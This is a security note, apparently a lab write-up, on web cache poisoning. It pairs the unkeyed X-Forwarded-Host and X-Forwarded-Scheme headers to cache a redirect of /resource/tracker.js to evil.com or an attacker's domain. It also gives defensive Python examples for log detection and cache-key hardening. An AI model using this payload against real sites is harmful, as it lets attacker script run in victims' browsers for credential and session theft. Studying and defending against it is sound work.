Note(Datetime, Name) : 2025-04-25 Web Cache Poisoning with multiple headers
Methodology
- Investigate the system to retrieve a list of features
- Describe each feature and explain how it works
- List possible vulnerabilities and group them by feature
- Proof of concept for the possible vulnerabilities
- What is the impact of the vulnerabilities after the proof of concept?
==========================================================================================================
feature:
- / -> response below -> Cache-Control: max-age=30 and X-Cache: miss indicate the page is served through a cache
```
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: session=aRRl8oPADEsf9eyGaK69gY43XSY30squ; Secure; HttpOnly; SameSite=None
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=30
Age: 0
X-Cache: miss
Connection: close
Content-Length: 10914
```
steps taken:
- X-Forwarded-Host: evil.com alone -> normal response
- X-Forwarded-Scheme: http alone -> server redirects to the https version of the website
- both headers together (payload below) -> response redirects to evil.com and that response is cached by the server
X-Forwarded-Host: evil.com
X-Forwarded-Scheme: http
vulnerabilities:
- web cache poisoning via unkeyed headers (X-Forwarded-Host and X-Forwarded-Scheme are honoured by the origin but not part of the cache key)
X-Forwarded-Host: evil.com
X-Forwarded-Scheme: http
Proof of concept:
- send the payload to / -> response redirects to evil.com -> response is cached
X-Forwarded-Host: evil.com
X-Forwarded-Scheme: http
- Locate the file /resource/tracker.js and confirm that it is cacheable.
- Apply this payload and send a request to /resource/tracker.js. Make sure the tracker.js response is cached by the server:
X-Forwarded-Host: <yourdomain>
X-Forwarded-Scheme: http
- After the response is cached, any page that includes tracker.js will request /resource/tracker.js, receive the cached redirect and load the script from <yourdomain>.
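From the defender's side, the steps above leave two signals in edge-proxy logs: X-Forwarded-* headers arriving from clients that are not the internal proxy tier, and redirects (especially cache hits) whose Location points away from the canonical host. The following is an added example, not part of this note or of any lab code; the JSON log format, field names, CANONICAL_HOST and TRUSTED_PROXIES are assumptions made for the illustration, and the log lines are constructed.

```python
import json
from collections import Counter
from urllib.parse import urlsplit

CANONICAL_HOST = "example.com"      # assumed canonical host of the site
TRUSTED_PROXIES = {"10.0.0.5"}      # assumed address of the internal proxy allowed to set X-Forwarded-*
FORWARDED = ("X-Forwarded-Host", "X-Forwarded-Scheme")

# Constructed edge-log lines, one JSON record per line. The field names are an
# assumption for this example, not the format of any particular proxy.
SAMPLE_LOG = """\
{"client":"10.0.0.5","path":"/","status":200,"x_cache":"miss","location":null,"req_headers":{"X-Forwarded-Scheme":"https"}}
{"client":"203.0.113.7","path":"/resource/tracker.js","status":302,"x_cache":"miss","location":"https://evil.com/resource/tracker.js","req_headers":{"X-Forwarded-Host":"evil.com","X-Forwarded-Scheme":"http"}}
{"client":"198.51.100.9","path":"/resource/tracker.js","status":302,"x_cache":"hit","location":"https://evil.com/resource/tracker.js","req_headers":{}}
{"client":"198.51.100.9","path":"/","status":200,"x_cache":"hit","location":null,"req_headers":{}}
{"client":"203.0.113.7","path":"/","status":302,"x_cache":"miss","location":"https://example.com/","req_headers":{"X-Forwarded-Scheme":"http"}}
"""


def analyse(log_text):
    """Return (line_no, kind, detail, path) findings for the two poisoning signals."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        rec = json.loads(line)
        hdrs = rec.get("req_headers", {})

        # Rule 1: X-Forwarded-* must only originate from the trusted proxy tier.
        # Any other client sending them is either misconfigured or probing.
        if rec["client"] not in TRUSTED_PROXIES and any(h in hdrs for h in FORWARDED):
            findings.append((n, "untrusted-forwarded", rec["client"], rec["path"]))

        # Rule 2: a redirect that leaves the canonical host. If it was served as a
        # cache hit, the poisoned response is already being handed to other users.
        loc = rec.get("location")
        if loc:
            host = urlsplit(loc).hostname
            if host != CANONICAL_HOST:
                kind = "poisoned-cache-hit" if rec.get("x_cache") == "hit" else "offsite-redirect"
                findings.append((n, kind, host, rec["path"]))
    return findings


def summarise(findings):
    """Count findings per kind; a non-zero poisoned-cache-hit count means purge the cache now."""
    return dict(Counter(kind for _, kind, _, _ in findings))


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f)
    print(summarise(analyse(SAMPLE_LOG)))
```

The poisoned-cache-hit finding is the one that matters operationally: it shows the redirect already sitting in the shared cache, so the response is to purge the affected keys (here /resource/tracker.js) and then fix the origin or cache configuration, not only to block the client that sent the headers.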
impact
1. An attacker can poison the cache and cause browsers to load a malicious tracker.js file.
2. This can lead to the execution of arbitrary JavaScript on victim pages, resulting in:
- Stolen credentials
- Session hijacking
- Full client-side takeover (depending on script capabilities)
takeaways
1. Always validate and sanitize any input headers, especially X-Forwarded-*.
2. Ensure cache keys include all relevant headers to prevent cache poisoning.
3. Avoid caching responses that include user-controllable input (even in headers).
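To make the steps taken and the takeaways concrete, here is an added example (not code from this note or from the lab it describes) that models the origin behaviour observed above and a shared cache in front of it, once with a path-only cache key and once with takeaways 1 and 2 applied: X-Forwarded-* headers are dropped unless they come from the trusted proxy, and the headers that influence the response are part of the cache key. The class and function names, CANONICAL_HOST, TRUSTED_PROXIES and the client addresses are assumptions made for the illustration.

```python
from dataclasses import dataclass, replace

CANONICAL_HOST = "example.com"   # assumed canonical host of the site
TRUSTED_PROXIES = {"10.0.0.5"}   # assumed: only this internal proxy may set X-Forwarded-*
FORWARDED = ("X-Forwarded-Host", "X-Forwarded-Scheme")


@dataclass
class Request:
    path: str
    headers: dict
    client_ip: str = "203.0.113.7"   # constructed external client address


@dataclass
class Response:
    status: int
    headers: dict
    body: str = ""


def origin(req: Request) -> Response:
    """Origin behaving as the note observed: a non-https X-Forwarded-Scheme triggers a
    redirect to the https URL, and the redirect host is taken from X-Forwarded-Host."""
    scheme = req.headers.get("X-Forwarded-Scheme", "https")
    host = req.headers.get("X-Forwarded-Host") or req.headers.get("Host", CANONICAL_HOST)
    if scheme != "https":
        return Response(302, {"Location": f"https://{host}{req.path}", "Cache-Control": "max-age=30"})
    return Response(200, {"Content-Type": "text/html", "Cache-Control": "max-age=30"}, "<html>ok</html>")


def weak_key(req):
    # Cache key built from the path only: X-Forwarded-* become unkeyed input.
    return (req.path,)


def hardened_key(req):
    # Takeaway 2: every header that influences the response is part of the key.
    return (req.path,) + tuple(req.headers.get(h, "") for h in FORWARDED)


def drop_untrusted_forwarded(req):
    # Takeaway 1: X-Forwarded-* are honoured only when set by the trusted proxy tier.
    if req.client_ip in TRUSTED_PROXIES:
        return req
    return replace(req, headers={k: v for k, v in req.headers.items() if k not in FORWARDED})


class EdgeCache:
    """Toy shared cache in front of origin(); stores any response carrying max-age."""

    def __init__(self, key_fn, sanitize=lambda r: r):
        self.key_fn, self.sanitize, self.store = key_fn, sanitize, {}

    def handle(self, req):
        req = self.sanitize(req)
        key = self.key_fn(req)
        if key in self.store:
            return self.store[key], "hit"
        resp = origin(req)
        if "max-age" in resp.headers.get("Cache-Control", ""):
            self.store[key] = resp
        return resp, "miss"


def poison_then_fetch(cache):
    """Replays the note's scenario: one request carrying both headers, then a plain request
    from a different client for the same path. Returns what the second client received."""
    first = Request("/", {"Host": CANONICAL_HOST, "X-Forwarded-Host": "evil.com", "X-Forwarded-Scheme": "http"})
    second = Request("/", {"Host": CANONICAL_HOST}, client_ip="198.51.100.9")
    cache.handle(first)
    resp, state = cache.handle(second)
    return resp.status, resp.headers.get("Location"), state


if __name__ == "__main__":
    print("weak    :", poison_then_fetch(EdgeCache(weak_key)))
    print("hardened:", poison_then_fetch(EdgeCache(hardened_key, drop_untrusted_forwarded)))
```

With the weak key the second client is served the cached 302 to evil.com; with the hardened configuration it gets the cached 200, and a redirect the trusted proxy legitimately triggers lands under its own key (path plus scheme) so it can never be served to a request that did not carry that header.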